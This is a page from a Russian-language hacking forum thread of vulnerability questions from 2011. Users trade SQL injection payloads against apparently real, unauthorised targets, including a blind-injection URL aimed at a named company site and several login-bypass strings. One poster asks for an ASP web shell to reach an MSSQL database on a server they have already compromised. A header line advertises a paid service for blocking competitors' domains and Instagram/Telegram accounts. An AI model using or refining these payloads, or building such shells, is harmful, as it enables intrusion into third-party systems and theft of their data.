УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Ваши вопросы по уязвимостям.

Страница 1837 из 2438

1837

Опции темы

Поиск в этой теме

Опции просмотра

#18361

25.10.2011, 00:27

er9j6@

Guest

Сообщений: n/a

Провел на форуме:
107835

Репутация: 23

Цитата:

Сообщение от smirk

smirk said:
всем ку)
http://www.uralremstroy.ru/catalog.php?group_id=104
с простыми эксплуатациями sql inj знаком, но как тут вывести кол-во полей ни как не пойму или там вообще нельзя вывести?
Заранее спасибо.

Там 4-ветка, и только блинд

http://www.uralremstroy.ru/catalog.php?group_id=14)+and+substring(version(),1 ,1)=4--+

#18362

25.10.2011, 01:26

cetlainform

Guest

Сообщений: n/a

Провел на форуме:
0

Репутация: 0

при сканирование сайта Acunetix Web Vulnerability Scanner 7 есть опасная уезвимость

require valid-user

как я понял это уязвимость связана с http и https при постановки https в нужный запрос получаем сертификат безопасности

как эту уязвимость реализовать?

#18363

25.10.2011, 07:04

M1lten

Guest

Сообщений: n/a

Провел на форуме:
12753

Репутация: 0

Не получается раскрутить скуль, при авторизации:

При запросе, т.е. логине

Цитата:

Сообщение от None

asd
'

, выскакивает ошибка:

Цитата:

Сообщение от None

MySQL Query fail: SELECT user_pass, user_salt, user_group, user_id FROM `users` WHERE user_name = 'asd
''

При asd' or 1=1--

Цитата:

Сообщение от None

... WHERE user_name = 'asd' or 1=1--'

Но при asd' or '1=1-- ошибка пропадает, и пишется только что не правильный пароль.

Помогите с запросом, уже с or 1=1 как только мог извращался, не пускает

#18364

25.10.2011, 15:41

ZARO

Познающий

Регистрация: 17.04.2009

Сообщений: 59

Провел на форуме:
401944

Репутация: 37

Отправить сообщение для ZARO с помощью ICQ

Цитата:

Сообщение от M1lten

M1lten said:
Не получается раскрутить скуль, при авторизации:
При запросе, т.е. логине , выскакивает ошибка:
При asd' or 1=1--
Но при asd' or '1=1-- ошибка пропадает, и пишется только что не правильный пароль.
Помогите с запросом, уже с or 1=1 как только мог извращался, не пускает

Действующий ник, например admin' or 1='1

#18365

25.10.2011, 16:13

попугай

Познавший АНТИЧАТ

Регистрация: 15.01.2008

Сообщений: 1,166

Провел на форуме:
2459557

Репутация: 606

Цитата:

Сообщение от M1lten

что-то типа этого, но так как там соль, то однозначно сказать нельзя, попробуй тем не менее:

asd' union select 'pass', 'salt', 1, '1

логин указываешь asd

пасс pass

#18366

25.10.2011, 16:32

ZARO

Познающий

Регистрация: 17.04.2009

Сообщений: 59

Провел на форуме:
401944

Репутация: 37

Есть данные для подключения к MSSQL серверу и шелл на серваке, никак не могу подкконектиться к базе, через php не хочет, как я понял нужен asp шелл с поддержкой mssql. поделитесь ктонибудь?

#18367

25.10.2011, 16:34

vaddd

Познающий

Регистрация: 06.01.2009

Сообщений: 69

Провел на форуме:
116125

Репутация: 3

Цитата:

Сообщение от ZARO

ZARO said:
Есть данные для подключения к MSSQL серверу и шелл на серваке, никак не могу подкконектиться к базе, через php не хочет, как я понял нужен asp шелл с поддержкой mssql. поделитесь ктонибудь?

http://www.plus2net.com/asp-tutorial/db-mssqlconn.php

попробуй из этого сделать простенький шелл

#18368

25.10.2011, 17:07

M1lten

Guest

Сообщений: n/a

Провел на форуме:
12753

Репутация: 0

Цитата:

Сообщение от попугай

попугай said:
что-то типа этого, но так как там соль, то однозначно сказать нельзя, попробуй тем не менее:
asd' union select 'pass', 'salt', 1, '1
логин указываешь asd
пасс pass

При таком запросе ошибки от мускуля нет, но в ответ я получаю, что пароль не верный.

#18369

25.10.2011, 17:15

Boolean

Guest

Сообщений: n/a

Провел на форуме:
40748

Репутация: 78

Цитата:

Сообщение от попугай

1' or 1=1 #

И MySQL отдаст всех юзеров, где соблюдается условие 1=1. А соблюдается оно везде.

1' OR 1=1 LIMIT 1 #

Думаю так должно сработать.

#18370

25.10.2011, 17:26

M1lten

Guest

Сообщений: n/a

Провел на форуме:
12753

Репутация: 0

Цитата:

Сообщение от Boolean

Boolean said:
1' or 1=1 #
И MySQL отдаст всех юзеров, где соблюдается условие 1=1. А соблюдается оно везде.
1' OR 1=1 LIMIT 1 #
Думаю так должно сработать.

Тоже, ошибки нет, но пишет что не правильный пароль.

Если что, могу кому-то в пм кинуть

Страница 1837 из 2438

1837

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился)	PEPSICOLA	Болталка	188	23.05.2010 10:05
Ваши любимые компьютерные игры	PEPSICOLA	Болталка	280	19.08.2009 00:01
Ваши телеги...	F-IFTY	Болталка	13	18.08.2009 18:22
Вопросы по Ipb 2.0	Voodoo_People	Уязвимости CMS / форумов	26	15.02.2005 22:57

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход